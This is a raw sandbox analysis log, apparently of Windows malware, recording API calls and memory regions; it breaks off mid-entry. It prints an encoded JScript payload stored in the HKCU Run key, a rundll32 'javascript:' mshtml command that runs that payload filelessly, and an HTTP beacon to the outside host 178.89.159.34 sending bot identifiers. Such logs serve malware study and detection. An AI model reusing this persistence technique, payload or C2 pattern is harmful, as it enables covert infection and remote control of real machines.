mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0052.501] RegCloseKey (hKey=0x214) returned 0x0 [0052.501] Sleep (dwMilliseconds=0x1388) Thread: id = 23 os_tid = 0xaa4 [0047.498] _alloca_probe () returned 0x1e61b05 [0047.498] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x461e6f0, lpdwDisposition=0x0 | out: phkResult=0x461e6f0*=0xc8, lpdwDisposition=0x0) returned 0x0 [0047.498] NtCreateKey (in: KeyHandle=0x461e6f4, DesiredAccess=0xf013f, ObjectAttributes=0x461e6cc*(Length=0x18, RootDirectory=0xc8, ObjectName="\x01", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x461e6f4*=0xcc) returned 0x0 [0047.499] RegQueryValueExA (in: hKey=0xcc, lpValueName="s", lpReserved=0x0, lpType=0x0, lpData=0x461e820, lpcbData=0x461e714*=0x1000 | out: lpType=0x0, lpData=0x461e820*=0x0, lpcbData=0x461e714*=0x1000) returned 0x2 [0047.499] RegCloseKey (hKey=0xcc) returned 0x0 [0047.499] RegCloseKey (hKey=0xc8) returned 0x0 [0047.499] GetVersionExA (in: lpVersionInformation=0x461e434*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x461e434*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.499] _snprintf (in: _Dest=0x461e4e4, _Count=0x103, _Format="%1d.%1d.%04d_%1d.%1d" | out: _Dest="6.1.7601_1.0") returned 12 [0047.499] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0047.499] GetProcAddress (hModule=0x765b0000, lpProcName="IsWow64Process") returned 0x765c195e [0047.499] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x461e4cc | out: Wow64Process=0x461e4cc) returned 1 [0047.499] _snprintf (in: _Dest=0x461e5ec, _Count=0x103, _Format="type=cmd&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s" | out: _Dest="type=cmd&version=1.0&aid=8&builddate=060414&id=c43dc7584a0&os=6.1.7601_1.0_64") returned 77 [0047.499] GetTickCount () returned 0x13be6 [0047.499] RtlRandom (in: Seed=0x461e4c0 | out: Seed=0x461e4c0) returned 0x7112b3f1 [0047.499] _alloca_probe () returned 0x1e62190 [0047.499] _vsnprintf (in: string=0x461a4c0, count=0x1000, format="http://%s/q", ap=0x461e4d4 | out: string="http://178.89.159.34/q") returned 22 [0047.499] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x461a330 | out: lpWSAData=0x461a330) returned 0 [0047.503] InternetCrackUrlA (in: lpszUrl="http://178.89.159.34/q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x461a2f4 | out: lpUrlComponents=0x461a2f4) returned 1 [0047.547] socket (af=2, type=1, protocol=6) returned 0x17c [0047.552] gethostbyname (name="178.89.159.34") returned 0x234898*(h_name="178.89.159.34", h_aliases=0x2348a8*=(), h_addrtype=2, h_length=4, h_addr_list=0x2348ac*=([0]="178.89.159.34")) [0047.579] connect (s=0x17c, name=0x461a2e4*(sa_family=2, sin_port=0x50, sin_addr="178.89.159.34"), namelen=16) Thread: id = 24 os_tid = 0xaac Process: id = "5" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x1ca40000" os_pid = "0x674" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\rundll32.exe\" javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4f9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 687 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 690 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 691 start_va = 0x77a80000 end_va = 0x77c28fff entry_point = 0x77a80000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 692 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 693 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 694 start_va = 0xff9f0000 end_va = 0xff9fefff entry_point = 0xff9f0000 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 695 start_va = 0x7feffda0000 end_va = 0x7feffda0fff entry_point = 0x7feffda0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 696 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 697 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 698 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 831 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 832 start_va = 0x77960000 end_va = 0x77a7efff entry_point = 0x77960000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 833 start_va = 0x7fefdc90000 end_va = 0x7fefdcfafff entry_point = 0x7fefdc90000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 834 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 835 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 836 start_va = 0x77860000 end_va = 0x77959fff entry_point = 0x77860000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 837 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 838 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 839 start_va = 0x7fefdda0000 end_va = 0x7fefde3efff entry_point = 0x7fefdda0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 840 start_va = 0x7fefed30000 end_va = 0x7fefed96fff entry_point = 0x7fefed30000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 841 start_va = 0x7fefeda0000 end_va = 0x7fefedb6fff entry_point = 0x7fefeda0000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 842 start_va = 0x7fefefc0000 end_va = 0x7feff088fff entry_point = 0x7fefefc0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 843 start_va = 0x7feff2c0000 end_va = 0x7feff2cdfff entry_point = 0x7feff2c0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 844 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 845 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 846 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 847 start_va = 0x7fefed00000 end_va = 0x7fefed2dfff entry_point = 0x7fefed00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 848 start_va = 0x7fefeeb0000 end_va = 0x7fefefb8fff entry_point = 0x7fefeeb0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 849 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 850 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 851 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 852 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 853 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 854 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 855 start_va = 0x1b80000 end_va = 0x1ec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 856 start_va = 0x1fe0000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 857 start_va = 0x77c50000 end_va = 0x77c56fff entry_point = 0x77c50000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 858 start_va = 0x7fef63d0000 end_va = 0x7fef6c67fff entry_point = 0x7fef63d0000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 859 start_va = 0x7fef73a0000 end_va = 0x7fef73dafff entry_point = 0x7fef73a0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 860 start_va = 0x7fefcb90000 end_va = 0x7fefcb9bfff entry_point = 0x7fefcb90000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 861 start_va = 0x7fefda70000 end_va = 0x7fefda7efff entry_point = 0x7fefda70000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 862 start_va = 0x7fefdb20000 end_va = 0x7fefdc86fff entry_point = 0x7fefdb20000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 863 start_va = 0x7fefebd0000 end_va = 0x7fefecfcfff entry_point = 0x7fefebd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 864 start_va = 0x7feff110000 end_va = 0x7feff239fff entry_point = 0x7feff110000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 865 start_va = 0x7feff2a0000 end_va = 0x7feff2befff entry_point = 0x7feff2a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 866 start_va = 0x7feff2d0000 end_va = 0x7feff3aafff entry_point = 0x7feff2d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 867 start_va = 0x7feff3b0000 end_va = 0x7feff486fff entry_point = 0x7feff3b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 868 start_va = 0x7feff490000 end_va = 0x7feff500fff entry_point = 0x7feff490000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 869 start_va = 0x7feff5b0000 end_va = 0x7feff808fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 870 start_va = 0x7feff810000 end_va = 0x7feff987fff entry_point = 0x7feff810000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 871 start_va = 0x7feff990000 end_va = 0x7feffb92fff entry_point = 0x7feff990000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 872 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 873 start_va = 0x2160000 end_va = 0x21dffff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 874 start_va = 0x7fefc9c0000 end_va = 0x7fefc9ecfff entry_point = 0x7fefc9c0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 875 start_va = 